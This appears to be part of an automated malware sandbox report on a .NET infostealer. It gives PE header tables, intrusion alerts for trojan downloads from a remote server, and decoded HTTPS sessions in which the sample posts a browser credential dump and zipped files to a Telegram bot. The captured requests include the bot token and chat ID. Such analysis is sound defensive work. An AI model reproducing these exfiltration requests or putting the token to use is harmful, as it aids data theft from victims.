                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x34a0 | 0x1c | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                        .text | 0x2000 | 0x1514 | 0x1600 | False | 0.5262784090909091 | SysEx File - | 5.433968712862039 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc | 0x4000 | 0x55c | 0x600 | False | 0.3977864583333333 | data | 3.913499305668389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc | 0x6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        Name | RVA | Size | Type | Language | Country
                                                                                        RT_VERSION | 0x4090 | 0x2cc | data | |
                                                                                        RT_MANIFEST | 0x436c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
                                                                                        DLL | Import
                                                                                        mscoree.dll | _CorExeMain
                                                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                        10/14/22-00:42:30.686053 | TCP | 2012252 | ET SHELLCODE Common 0a0a0a0a Heap Spray String | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:42:30.034188 | TCP | 2017962 | ET TROJAN PE EXE or DLL Windows file download disguised as ASCII | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:42:29.991059 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        10/14/22-00:44:33.586734 | TCP | 2022640 | ET TROJAN PE EXE or DLL Windows file download Text M2 | 80 | 49700 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:44:33.554000 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49700 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        10/14/22-00:44:48.157973 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49701 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        10/14/22-00:44:33.870351 | TCP | 2012252 | ET SHELLCODE Common 0a0a0a0a Heap Spray String | 80 | 49700 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:42:30.034188 | TCP | 2022640 | ET TROJAN PE EXE or DLL Windows file download Text M2 | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:44:33.586734 | TCP | 2017962 | ET TROJAN PE EXE or DLL Windows file download disguised as ASCII | 80 | 49700 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:44:48.194634 | TCP | 2017962 | ET TROJAN PE EXE or DLL Windows file download disguised as ASCII | 80 | 49701 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:44:48.194634 | TCP | 2022640 | ET TROJAN PE EXE or DLL Windows file download Text M2 | 80 | 49701 | 41.216.183.235 | 192.168.2.3
                                                                                        10/14/22-00:44:48.589687 | TCP | 2012252 | ET SHELLCODE Common 0a0a0a0a Heap Spray String | 80 | 49701 | 41.216.183.235 | 192.168.2.3
                                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Oct 14, 2022 00:42:29.960601091 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:29.989819050 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:29.990046024 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:29.991059065 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034188032 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034231901 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034260988 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034287930 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034316063 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034343958 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034372091 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034384012 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034399986 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034415960 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034429073 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034437895 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:30.034459114 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.034493923 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063406944 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063456059 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063483953 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063514948 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063535929 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063558102 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063591003 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063616037 CEST | 49699 | 80 | 192.168.2.3 | 41.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063621044 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063651085 CEST | 80 | 49699 | 41.216.183.235 | 192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063682079 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063709021 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063711882 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063741922 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063743114 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063771009 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063790083 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063800097 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063827991 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063843966 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063854933 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063882113 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063895941 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063910961 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063941956 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.063952923 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.063973904 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.064013958 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.092878103 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092920065 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092943907 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092964888 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.092988014 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093012094 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093031883 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093054056 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093074083 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093079090 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093096018 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093118906 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093138933 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093138933 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093151093 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093163013 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093185902 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093203068 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093206882 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093230009 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093250036 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093250990 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093271971 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093276024 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093293905 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093316078 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093332052 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093337059 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093359947 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093365908 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093381882 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093404055 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093408108 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093425989 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093446970 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093467951 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093467951 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093491077 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093492985 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093513012 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093534946 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093552113 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093554974 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093576908 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093585968 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093600035 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093621016 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093621016 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093643904 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093663931 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093664885 CEST4969980192.168.2.341.216.183.235
                                                                                        Oct 14, 2022 00:42:30.093687057 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093708038 CEST804969941.216.183.235192.168.2.3
                                                                                        Oct 14, 2022 00:42:30.093713999 CEST4969980192.168.2.341.216.183.235
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 14, 2022 00:45:05.847289085 CEST | 192.168.2.3 | 8.8.8.8 | 0xfe94 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 14, 2022 00:45:06.980432987 CEST | 192.168.2.3 | 8.8.8.8 | 0x17e | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 14, 2022 00:45:07.325618029 CEST | 192.168.2.3 | 8.8.8.8 | 0xb48f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 14, 2022 00:45:05.866142988 CEST | 8.8.8.8 | 192.168.2.3 | 0xfe94 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 14, 2022 00:45:06.997174025 CEST | 8.8.8.8 | 192.168.2.3 | 0x17e | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 14, 2022 00:45:07.344508886 CEST | 8.8.8.8 | 192.168.2.3 | 0xb48f | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                        • api.telegram.org
                                                                                        • 41.216.183.235
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49702 | 149.154.167.220 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
2022-10-13 22:45:06 UTC | 0 | OUT | POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary="e749d4e4-749a-41ce-b152-70d8d1eceec1"
Host: api.telegram.org
Content-Length: 2227
Expect: 100-continue
Connection: Keep-Alive
2022-10-13 22:45:06 UTC | 0 | IN | HTTP/1.1 100 Continue
2022-10-13 22:45:06 UTC | 0 | OUT | Data Raw: 2d 2d 65 37 34 39 64 34 65 34 2d 37 34 39 61 2d 34 31 63 65 2d 62 31 35 32 2d 37 30 64 38 64 31 65 63 65 65 63 31 0d 0a
Data Ascii: --e749d4e4-749a-41ce-b152-70d8d1eceec1
2022-10-13 22:45:06 UTC | 0 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2022-10-13 22:45:06 UTC | 0 | OUT | Data Raw: 31 32 37 35 39 34 36 30 35 38
Data Ascii: 1275946058
2022-10-13 22:45:06 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 65 37 34 39 64 34 65 34 2d 37 34 39 61 2d 34 31 63 65 2d 62 31 35 32 2d 37 30 64 38 64 31 65 63 65 65 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 68 61 72 64 7a 2d 64 75 6d 70 2e 74 78 74 0d 0a 0d 0a
Data Ascii: --e749d4e4-749a-41ce-b152-70d8d1eceec1Content-Disposition: form-data; name=document; filename=user-dump.txt
2022-10-13 22:45:06 UTC | 0 | OUT | Data Raw: 55 73 65 72 20 6e 61 6d 65 3a 20 68 61 72 64 7a 0d 0a 4d 61 63 68 69 6e 65 20 6e 61 6d 65 3a 20 38 34 31 36 31 38 0d 0a 57 6f 72 6b 69 6e 67 20 64 69 72 65 63 74 6f 72 79 3a 20 43 3a 5c 55 73 65 72 73 5c 68 61 72 64 7a 5c 44 65 73 6b 74 6f 70 0d 0a 42 69 74 73 3a 20 36 34 20 42 69 74 0d 0a 41 6e 74 69 76 69 72 75 73 28 73 29 20 61 63 74 69 76 65 3a 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 0d 0a 3d 2d 2d 2d 2d 2d 44 75 6d 70 20 6f 66 20 63 68 72 6f 6d 65 64 20 62 61 73 65 64 20 62 72 6f 77 73 65 72 73 20 5b 43 3a 5c 55 73 65 72 73 5c 68 61 72 64 7a 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 5d 2d 2d 2d 2d 2d 3d 0d 0a 2d 2d 2d 41 63 63 6f 75 6e 74 73 2d
Data Ascii: User name: userMachine name: 841618Working directory: C:\Users\user\DesktopBits: 64 BitAntivirus(s) active: Windows Defender=-----Dump of chromed based browsers [C:\Users\user\AppData\Local\Google\Chrome\User Data\Default]-----=---Accounts-
2022-10-13 22:45:06 UTC | 2 | OUT | Data Raw: 0d 0a 2d 2d 65 37 34 39 64 34 65 34 2d 37 34 39 61 2d 34 31 63 65 2d 62 31 35 32 2d 37 30 64 38 64 31 65 63 65 65 63 31 2d 2d 0d 0a
Data Ascii: --e749d4e4-749a-41ce-b152-70d8d1eceec1--
2022-10-13 22:45:06 UTC | 2 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 13 Oct 2022 22:45:06 GMT
Content-Type: application/json
Content-Length: 431
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":362,"from":{"id":5796425317,"is_bot":true,"first_name":"Grace","username":"Triliion_bot"},"chat":{"id":1275946058,"first_name":"derick","last_name":"menson","type":"private"},"date":1665701106,"document":{"file_name":"user-dump.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIBamNIlPIID7qPLja0dAwQ6Dwc_aZ_AAIYDgACbJ1BUoZWGUGj4uZlKgQ","file_unique_id":"AgADGA4AAmydQVI","file_size":1928}}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49703 | 149.154.167.220 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | kBytes transferred | Direction | Data
2022-10-13 22:45:07 UTC | 3 | OUT | POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary="faf7003a-b216-46df-be53-6f8f76b435f5"
Host: api.telegram.org
Content-Length: 13782
Expect: 100-continue
2022-10-13 22:45:07 UTC | 3 | IN | HTTP/1.1 100 Continue
2022-10-13 22:45:07 UTC | 3 | OUT | Data Raw: 2d 2d 66 61 66 37 30 30 33 61 2d 62 32 31 36 2d 34 36 64 66 2d 62 65 35 33 2d 36 66 38 66 37 36 62 34 33 35 66 35 0d 0a
Data Ascii: --faf7003a-b216-46df-be53-6f8f76b435f5
2022-10-13 22:45:07 UTC | 3 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2022-10-13 22:45:07 UTC | 3 | OUT | Data Raw: 31 32 37 35 39 34 36 30 35 38
Data Ascii: 1275946058
2022-10-13 22:45:07 UTC | 3 | OUT | Data Raw: 0d 0a 2d 2d 66 61 66 37 30 30 33 61 2d 62 32 31 36 2d 34 36 64 66 2d 62 65 35 33 2d 36 66 38 66 37 36 62 34 33 35 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 65 6e 73 69 74 69 76 65 2e 7a 69 70 0d 0a 0d 0a
Data Ascii: --faf7003a-b216-46df-be53-6f8f76b435f5Content-Disposition: form-data; name=document; filename=sensitive.zip
2022-10-13 22:45:07 UTC | 3 | OUT | Data Raw: 50 4b 03 04 14 00 00 00 08 00 d9 74 10 55 52 e3 0d dc 83 02 00 00 02 04 00 00 0f 00 00 00 41 51 52 46 45 56 52 54 47 4c 2e 64 6f 63 78 15 93 47 6e 40 31 08 44 f7 91 72 28 57 dc 6d 30 c6 e5 fe 07 c9 cf 16 10 8c 66 1e 0a c9 3b 21 86 42 a3 c9 aa aa 06 be 8e 9d 80 75 2d b8 f0 ac 42 3a 0f 8d 0d a1 f0 7a d1 25 32 08 30 08 b7 8e 77 2b bb 93 7b ac 5c 71 94 df b2 2f 85 e9 25 ae a1 39 09 e4 8b 7e 4b 1d 8c eb ad f7 66 4f 4d 77 a5 2f 90 b9 75 4c 54 24 5f 07 c5 34 71 e6 0c a3 a3 d3 77 9f 3d a9 72 f6 59 bb 40 09 e2 f0 b5 df f9 aa 73 45 e1 00 1d 2c af 21 27 51 47 dd fc 29 ec 79 60 10 05 59 53 69 e1 d1 93 c5 0e 54 ab 90 85 7c 4a ad d7 5c a4 62 e3 10 3b 0d 34 03 5a fc d4 dc 7c 14 26 d3 47 04 8d 94 62 93 11 49 7a 08 a6 c3 c6 71 36 3a b0 59 85 a4 26 c5 a4 63 7d b6 ef 31 cd
Data Ascii: PKtURAQRFEVRTGL.docxGn@1Dr(Wm0f;!Bu-B:z%20w+{\q/%9~KfOMw/uLT$_4qw=rY@sE,!'QG)y`YSiT|J\b;4Z|&GbIzq6:Y&c}1
2022-10-13 22:45:07 UTC | 16 | OUT | Data Raw: 0d 0a 2d 2d 66 61 66 37 30 30 33 61 2d 62 32 31 36 2d 34 36 64 66 2d 62 65 35 33 2d 36 66 38 66 37 36 62 34 33 35 66 35 2d 2d 0d 0a
Data Ascii: --faf7003a-b216-46df-be53-6f8f76b435f5--
2022-10-13 22:45:07 UTC | 16 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 13 Oct 2022 22:45:07 GMT
Content-Type: application/json
Content-Length: 437
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":363,"from":{"id":5796425317,"is_bot":true,"first_name":"Grace","username":"Triliion_bot"},"chat":{"id":1275946058,"first_name":"derick","last_name":"menson","type":"private"},"date":1665701107,"document":{"file_name":"sensitive.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIBa2NIlPMbJMotOYDZz5UxtLfW_gABEgACGQ4AAmydQVJPo2estpHGtCoE","file_unique_id":"AgADGQ4AAmydQVI","file_size":13484}}}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        2192.168.2.349704149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2022-10-13 22:45:07 UTC17OUTPOST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary="124a0fb1-8a78-4c1b-8ed5-2e41b547b56a"
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 315
                                                                                        Expect: 100-continue
                                                                                        2022-10-13 22:45:07 UTC17INHTTP/1.1 100 Continue
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 2d 2d 31 32 34 61 30 66 62 31 2d 38 61 37 38 2d 34 63 31 62 2d 38 65 64 35 2d 32 65 34 31 62 35 34 37 62 35 36 61 0d 0a
                                                                                        Data Ascii: --124a0fb1-8a78-4c1b-8ed5-2e41b547b56a
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                        Data Ascii: Content-Type: text/plain; charset=utf-8\r\nContent-Disposition: form-data; name=chat_id\r\n\r\n
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 31 32 37 35 39 34 36 30 35 38
                                                                                        Data Ascii: 1275946058
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 0d 0a 2d 2d 31 32 34 61 30 66 62 31 2d 38 61 37 38 2d 34 63 31 62 2d 38 65 64 35 2d 32 65 34 31 62 35 34 37 62 35 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 6d 69 73 63 2e 7a 69 70 0d 0a 0d 0a
                                                                                        Data Ascii: \r\n--124a0fb1-8a78-4c1b-8ed5-2e41b547b56a\r\nContent-Disposition: form-data; name=document; filename=misc.zip\r\n\r\n
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 50 4b 05 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: PK\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
                                                                                        2022-10-13 22:45:07 UTC18OUTData Raw: 0d 0a 2d 2d 31 32 34 61 30 66 62 31 2d 38 61 37 38 2d 34 63 31 62 2d 38 65 64 35 2d 32 65 34 31 62 35 34 37 62 35 36 61 2d 2d 0d 0a
                                                                                        Data Ascii: \r\n--124a0fb1-8a78-4c1b-8ed5-2e41b547b56a--\r\n
                                                                                        2022-10-13 22:45:07 UTC18INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 13 Oct 2022 22:45:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 428
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
